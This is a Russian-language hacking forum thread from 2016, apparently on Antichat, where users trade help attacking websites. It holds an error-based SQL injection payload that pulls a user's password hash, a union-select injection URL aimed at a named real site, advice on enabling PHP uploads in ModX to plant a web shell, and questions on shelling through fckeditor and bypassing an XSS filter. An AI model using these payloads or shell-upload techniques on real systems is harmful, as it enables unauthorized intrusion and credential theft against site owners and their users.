 |
|
20.01.2016, 00:29
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
|
|
|
20.01.2016, 03:37
|
|
Познающий
Регистрация: 08.01.2016
Сообщений: 33
С нами:
5445686
Репутация:
0
|
|
Сообщение от Sensoft
↑
Ребят помогите пожалуйста
Считается это уязвимостью ?
Я отправил пост запрос с таким кодом
Spoiler: Код
&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
и выдало это
Нет, обычный массив данных. Могу предположить передается яваскриптом при отправке формы.
|
|
|
|
20.01.2016, 11:10
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от kingbeef
↑
Блин, ну это не стоило постить.
http://missourimhf.org/view-event.php?id=227'+and+0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20--+k&table=schedule
ну Б*ть, ну 30 минут е++ся , спасибо.
|
|
|
|
21.01.2016, 23:09
|
|
Новичок
Регистрация: 18.01.2016
Сообщений: 15
С нами:
5431286
Репутация:
0
|
|
Как залить шелл в ModX? пробовал через "елементы", но там некуда заливаться судя по всему, вот что там:
This directory is empty.Directories: 0
Files: 0
Data: 0 B
Directory writable? No.
Есть еще какие варианты? Я слышал через сниппеты, но как? нигде не нашел толковой подробной инфы....
+ Есть возможность добавить пхп код в модуль, я пробовал добавлять , но двиг ругался на CSRF типа его атакуют) как правильно через модуль залится?
|
|
|
|
22.01.2016, 04:18
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от PulsarEX547
↑
Как залить шелл в ModX? пробовал через "елементы", но там некуда заливаться судя по всему, вот что там:
This directory is empty.Directories:
0
Files:
0
Data:
0 B
Directory writable?
No.
Есть еще какие варианты? Я слышал через сниппеты, но как? нигде не нашел толковой подробной инфы....
+ Есть возможность добавить пхп код в модуль, я пробовал добавлять , но двиг ругался на CSRF типа его атакуют) как правильно через модуль залится?
в системных настройках добавь возможность загрузки .php файлов, и через файлменеджер заливай
|
|
|
|
22.01.2016, 15:31
|
|
Новичок
Регистрация: 02.05.2012
Сообщений: 24
С нами:
7383926
Репутация:
0
|
|
Вопрос насчет XSS. Фильтр пускает все, но есть защита , все что между скобок удаляет, и если поставить пробел через скобку тоже пускает, но как вывести алерт не понял. p.s не получилось. пож помогите. сайт скину в ЛС
|
|
|
|
22.01.2016, 15:46
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Kolyan333
↑
Вопрос насчет XSS.
Фильтр пускает все, но есть защита , все что между скобок удаляет, и если поставить пробел через скобку тоже пускает, но как вывести алерт не понял. p.s не получилось. пож помогите.
сайт скину в ЛС
|
|
|
|
22.01.2016, 16:00
|
|
Новичок
Регистрация: 02.05.2012
Сообщений: 24
С нами:
7383926
Репутация:
0
|
|
|
|
|
|
22.01.2016, 19:04
|
|
Новичок
Регистрация: 18.01.2016
Сообщений: 15
С нами:
5431286
Репутация:
0
|
|
Сообщение от Br@!ns
↑
в системных настройках добавь возможность загрузки .php файлов, и через файлменеджер заливай
Ты видел что я написал? там нету директорий в которые можно хоть что то написать, и возможности записи - нет. Тут либо снипеты остаются, либо док менеджер...
|
|
|
|
23.01.2016, 17:00
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами:
6868406
Репутация:
2
|
|
Привет, вообщем нашел fckeditor. как через него залить шелл? может кто сталкивался?
 |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
